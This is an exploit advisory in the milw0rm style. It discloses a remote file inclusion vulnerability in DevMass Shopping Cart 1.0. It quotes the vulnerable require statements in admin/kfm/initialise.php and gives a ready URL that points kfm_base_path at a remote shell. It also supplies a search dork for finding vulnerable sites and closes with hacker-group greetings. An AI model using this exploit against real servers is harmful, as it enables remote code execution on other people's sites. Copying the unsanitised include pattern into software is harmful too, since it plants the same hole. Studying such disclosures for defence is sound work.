========================================================================
|| ## ## ## ########## ####### ######## ||
|| ## ## ########## ########## ## ## ## ||
|| #### ########## ## ## ####### ######## ||
|| #### ## ## ## ## ## ####### ## ||
|| ## ## ## ## ## ########## ## ## ## ||
|| ## ## ## ## ## ########## ## ## ######## ||
========================================================================
========================================================================
[*] DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability ||
[!] Download : http://www.devmass.com/downloads/devmass.cart.1.0.tar||
[!] Author : S.W.A.T. ||
[!] Site : wWw.XmorS.CoM - wWw.SvvaT.IR ||
[!] Y!ID : Svvateam ||
[!] E-Mail : S.W.4.T@hackermail.CoM ||
[!] Location : Iran - 071 ||
[!] Risk : Moderate ( High ) ||
[!] Dork : DevMass Shopping Cart ||
========================================================================
========================================================================
Vuln. code: admin/kfm/initialise.php ||
||
require $kfm_base_path.'includes/lang.php'; ||
require $kfm_base_path.'includes/db.php'; ||
require $kfm_base_path.'includes/object.class.php'; ||
require $kfm_base_path.'includes/session.class.php'; ||
require $kfm_base_path.'includes/file.class.php'; ||
require $kfm_base_path.'includes/image.class.php'; ||
require $kfm_base_path.'includes/directory.class.php'; ||
||
||
========================================================================
[*] Exploitation : ||
||
[target]/[path]/admin/kfm/initialise.php?kfm_base_path=[Shell] ||
||
========================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir - ||
[!] The_Editor - Silliconic - Sh3llH3ll ||
||
[!] I Love Xmors & All Member Of Them ||
||
[!] DeltaHackingGroup = ( Lammers Group :D ) ,,!,, ||
||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group ||
||
[!] Tnx 2 : Str0ke - Google - SourceForge ||
========================================================================
# milw0rm.com [2007-11-22]